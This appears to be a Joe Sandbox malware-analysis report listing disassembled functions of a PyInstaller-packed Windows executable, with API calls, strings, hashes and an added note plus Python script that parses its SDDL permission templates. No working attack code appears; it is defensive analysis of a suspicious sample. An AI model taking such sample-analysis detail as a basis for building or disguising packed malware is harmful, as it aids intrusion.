• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2030045667-2813020118
• Opcode ID: d861c908b3ab48e6fc6dc20ba232feaabb5c99f7ec28589f5dcfaa4faba5a722
• Instruction ID: 235a19356c93ce3a42da2f38b45c00a33ccb645bdc8f96a1bfa84f363406d5ea
• Opcode Fuzzy Hash: d861c908b3ab48e6fc6dc20ba232feaabb5c99f7ec28589f5dcfaa4faba5a722
• Instruction Fuzzy Hash: 2A51E172A0C662E1FA20FB15A9403BA6291FB85794F440135EE5DC7BE6EF3CE541C780

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF6404FE3BA,?,?,-00000018,00007FF6404FA063,?,?,?,00007FF6404F9F5A,?,?,?,00007FF6404F524E), ref: 00007FF6404FE19C
• GetProcAddress.KERNEL32(?,?,?,00007FF6404FE3BA,?,?,-00000018,00007FF6404FA063,?,?,?,00007FF6404F9F5A,?,?,?,00007FF6404F524E), ref: 00007FF6404FE1A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
• Instruction ID: b6910443d84c49c151f59c00ef2200bc76ce80b2dbad949d85a3e33c553a0d70
• Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
• Instruction Fuzzy Hash: A141E231B1DA22E1FA16FB17AA0467A229BFF45B90F084535DD1DC7784EE3CEA458300

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E7CE4
• CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E7D2C
  • Part of subcall function 00007FF6404E7E10: GetEnvironmentVariableW.KERNEL32(00007FF6404E365F), ref: 00007FF6404E7E47
  • Part of subcall function 00007FF6404E7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6404E7E69
  • Part of subcall function 00007FF6404F7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6404F7561
  • Part of subcall function 00007FF6404E26C0: MessageBoxW.USER32 ref: 00007FF6404E2736
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 740614611-1339014028
• Opcode ID: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
• Instruction ID: 05379c9ae0fcb58b5ad99494fa2f29691be71f51bb853eeff872209563e4896b
• Opcode Fuzzy Hash: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
• Instruction Fuzzy Hash: 00419121A0D662E0FA24FB619A55AFA2255EF957D4F405131EE1DC7796EE3CE5008380

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
• Instruction ID: 1befe4a4177dd3b3873daa27a92c6d9d73791894762db0d4e42a47cfc4a13dbd
• Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
• Instruction Fuzzy Hash: 6FC10162A0C6A7F1EB64BB1494402BE37AAFB92BC0F550131EA5D877D1CF7CE8558740
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
• Instruction ID: ac2e215d320ffff1b355f9a19b0d4e3315f0727fb6e3c8e833f686094dd3892a
• Opcode Fuzzy Hash: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
• Instruction Fuzzy Hash: 0221A031A0CA5292EB20FB55E58462AB3A5EF917F4F200235EA7C83BE4DF7CD4858740
APIs
• GetModuleFileNameW.KERNEL32(?,00007FF6404E3534), ref: 00007FF6404E3411
  • Part of subcall function 00007FF6404E29E0: GetLastError.KERNEL32(?,?,?,00007FF6404E342E,?,00007FF6404E3534), ref: 00007FF6404E2A14
  • Part of subcall function 00007FF6404E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6404E342E), ref: 00007FF6404E2A7D
  • Part of subcall function 00007FF6404E29E0: MessageBoxW.USER32 ref: 00007FF6404E2ACF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message$ErrorFileFormatLastModuleName
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 517058245-2863816727
• Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
• Instruction ID: 38c06243298b15ed8099fe7993e28303999cab98f5eaaac513a8b9e0303a0545
• Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
• Instruction Fuzzy Hash: A121A461B1C563F1FE25FB24E9553BA1260BF49395F800236DA6DC67D6EE2CE504C780
APIs
  • Part of subcall function 00007FF6404E7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6404E7B70
  • Part of subcall function 00007FF6404E7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6404E7B83
  • Part of subcall function 00007FF6404E7B50: GetTokenInformation.KERNELBASE ref: 00007FF6404E7BA8
  • Part of subcall function 00007FF6404E7B50: GetLastError.KERNEL32 ref: 00007FF6404E7BB2
  • Part of subcall function 00007FF6404E7B50: GetTokenInformation.KERNELBASE ref: 00007FF6404E7BF2
  • Part of subcall function 00007FF6404E7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6404E7C0E
  • Part of subcall function 00007FF6404E7B50: CloseHandle.KERNEL32 ref: 00007FF6404E7C26
• LocalFree.KERNEL32(?,00007FF6404E3814), ref: 00007FF6404E848C
• LocalFree.KERNEL32(?,00007FF6404E3814), ref: 00007FF6404E8495
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
• Instruction ID: 2d982544cdd8630cc35464163c093093a424154aa6d2a0564f51409ab334d1d6
• Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
• Instruction Fuzzy Hash: 42215131A0C762E1FA54FB10E6153EA62A5FF89780F444035EA5D83796DF3CE944C790
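Analyst note (added to this report; not part of the Joe Sandbox output or of the sample): the strings in this function are SDDL DACL templates. In SDDL, `A` is an ACCESS_ALLOWED ACE, `FA` is FILE_ALL_ACCESS, and S-1-3-4 is the well-known OWNER RIGHTS SID. The token calls in the subcall (OpenProcessToken, GetTokenInformation, ConvertSidToStringSidW) yield the current user's string SID that fills the first %s, and the PYI_PATH_MAX string marks this as PyInstaller bootloader code, which restricts its extraction directory to the running user rather than stealer logic. Which of the one- or two-ACE templates this build takes is not visible on the page. The Python below is an added example, written for this note rather than taken from the sample or from PyInstaller: it fills the recovered templates with a constructed user SID, parses the result back into ACEs, expands the abbreviations, and flags a DACL that would grant access to Everyone, Authenticated Users or Users. The PYI_PATH_MAX value (4096) and the well-known-SID table are assumptions.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import List, Tuple

# DACL templates recovered from this function's string table, and the
# well-known SID that the report shows next to them.
DACL_ONE_ACE = "D:(A;;FA;;;%s)"
DACL_TWO_ACE = "D:(A;;FA;;;%s)(A;;FA;;;%s)"
OWNER_RIGHTS_SID = "S-1-3-4"

# Assumption: PyInstaller's PYI_PATH_MAX is 4096. Used only to mirror the
# length check implied by the "exceeds PYI_PATH_MAX" error string.
PYI_PATH_MAX = 4096

# Constructed subset of well-known SIDs worth recognising during triage.
WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-3-4": "OWNER RIGHTS",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-18": "LOCAL SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
}
# SDDL rights abbreviations relevant to file objects (subset).
RIGHTS = {
    "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ",
    "FW": "FILE_GENERIC_WRITE", "FX": "FILE_GENERIC_EXECUTE",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ",
    "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
# Principals that mean "anyone on this machine" for the privacy check below.
BROAD_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}


@dataclass
class Ace:
    ace_type: str
    flags: str
    rights: str
    sid: str


def build_dacl(user_sid: str, second_sid: str | None = None) -> str:
    """Fill the recovered templates, then apply the length check that the
    error string in this function refers to."""
    sddl = DACL_ONE_ACE % user_sid if second_sid is None else DACL_TWO_ACE % (user_sid, second_sid)
    if len(sddl) >= PYI_PATH_MAX:
        raise ValueError("Security descriptor string length exceeds PYI_PATH_MAX!")
    return sddl


def parse_dacl(sddl: str) -> Tuple[str, List[Ace]]:
    """Parse D:<flags>(ACE)(ACE)... into DACL control flags and ACEs. Each ACE
    has six ';'-separated fields: type;flags;rights;object_guid;inherit_guid;sid."""
    if not sddl.startswith("D:"):
        raise ValueError("only the DACL component (D:...) is handled here")
    body = sddl[2:]
    first_paren = body.find("(")
    dacl_flags = body if first_paren < 0 else body[:first_paren]
    aces: List[Ace] = []
    for match in re.finditer(r"\(([^()]*)\)", body):
        fields = match.group(1).split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({match.group(1)})")
        ace_type, flags, rights, _obj_guid, _inherit_guid, sid = fields
        aces.append(Ace(ace_type, flags, rights, sid))
    return dacl_flags, aces


def describe(ace: Ace) -> str:
    """Expand one ACE's SDDL abbreviations into readable names."""
    who = WELL_KNOWN_SIDS.get(ace.sid, ace.sid)
    what = ACE_TYPES.get(ace.ace_type, ace.ace_type)
    if ace.rights.lower().startswith("0x"):
        rights = ace.rights  # raw access mask, leave as written
    else:
        rights = ",".join(RIGHTS.get(r, r) for r in re.findall(r"[A-Z]{2}", ace.rights)) or ace.rights
    return f"{what} {rights} -> {who}"


def grants_broad_access(aces: List[Ace]) -> bool:
    """True if any allow-ACE names Everyone, Authenticated Users or Users,
    i.e. the directory would not be private to the current user."""
    return any(a.ace_type == "A" and a.sid in BROAD_SIDS for a in aces)


def audit(sddl: str) -> List[str]:
    """Readable listing of every ACE in a DACL string."""
    return [describe(a) for a in parse_dacl(sddl)[1]]


if __name__ == "__main__":
    # Constructed SID standing in for what ConvertSidToStringSidW returns.
    user = "S-1-5-21-1111111111-2222222222-3333333333-1001"
    sddl = build_dacl(user, OWNER_RIGHTS_SID)
    print(sddl)
    for line in audit(sddl):
        print("  ", line)
    print("broad access:", grants_broad_access(parse_dacl(sddl)[1]))
```

Running it against the two-ACE template shows full access only to the constructed user SID and to OWNER RIGHTS, so `grants_broad_access` is false; pointing `audit` at a DACL containing `S-1-1-0` is the quickest way to see what a world-writable extraction directory would look like in the same notation.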
APIs
• CreateDirectoryW.KERNELBASE(00000000,?,00007FF6404E324C,?,?,00007FF6404E3964), ref: 00007FF6404E7642
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
• Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
• Instruction ID: 9b46986936144f648d47a0e7b2a7a9439cf12a4469b86afd1b15c1f4fe323bbc
• Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
• Instruction Fuzzy Hash: D131E821A1DAD2E5EA21FB25E8507EA6254FF94BF4F404231EE6D83BC9DF2CD6018740
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404FC25B), ref: 00007FF6404FC38C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404FC25B), ref: 00007FF6404FC417
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                                                            • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                                                            • Instruction ID: 1ef1bf0e5bd98d2ff22e0bb385fbef1a6847c2f9b2b3b3861d2e4785353c280b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D791C132E2C672E5F754FB6595502BD2BAAFB44B88F544139DE0EA6B84CF38E4418700
                                                                                                                                                                                                                                                            APIs
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
• Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
• Instruction ID: 6c8a11fa80f40a1d9154d283d6d20dd15fa663ec68a0fae0f30d144cd09012e5
• Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
• Instruction Fuzzy Hash: 5B51F972F0C122DAFB18FF6599456BC37AAAB1035AF500135DE1D96BE5DF38A642C700
APIs
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
• Instruction ID: 75f6c3af5d72fd27f8e01d6fb3b6d0b9943f265b4ae43a3d0d96952bcbb00385
• Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
• Instruction Fuzzy Hash: 5B516D22E0D661DAFB14FF71D4503BD27AAEB88B58F119535DE0987789DF38E4818740
APIs
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
• Instruction ID: b812c0209f54b6a60e057f1f873657876772e2061edb54fed5764d39b177f2ce
• Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
• Instruction Fuzzy Hash: BE41B062E1C79293F354FB6095503696266FBD47A4F109334EAAC83BD1EF6CA1E08700
APIs
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
• Instruction ID: 4535f9a2bdabda74afa0a46e2157a74f4d229af8e152e6f74e7c852a6d44e2ce
• Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
• Instruction Fuzzy Hash: 2B314D21E1C273E1FA54FBA495513B91382AF41389F440039EA5DCB7D3DE2DA9468781
APIs
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                            • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                            • Instruction ID: 275b5b68ebe631f5b405311be8789fbbdaaaa0075aa6f363818cb514755840b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCD06C24B1C62AE6FB6C3B70599917D1226AFA9B55F10193CD85A8A393CE2CA8098340
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                                                            • Instruction ID: ca09be03a7b31e671568cd9be017c4c4c3ddd44007bcefd41ad6f2076da691d1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C151F961B0D662E6FA28FE35940067A6281FF94BB8F144734DD6C877D5CE3CE4019760
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                                            • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                            • Instruction ID: 11897ebdb6b1aed41625d52ba5738dee62e4ce4432e9c10f9297da2409d0f1b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E811C161B0CAA1D1DA10FB25A94416D6366EB45BF4F640331EEBD87BEACF3CD0508740
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404F4B49), ref: 00007FF6404F4C67
                                                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404F4B49), ref: 00007FF6404F4C7D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                                                                            • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
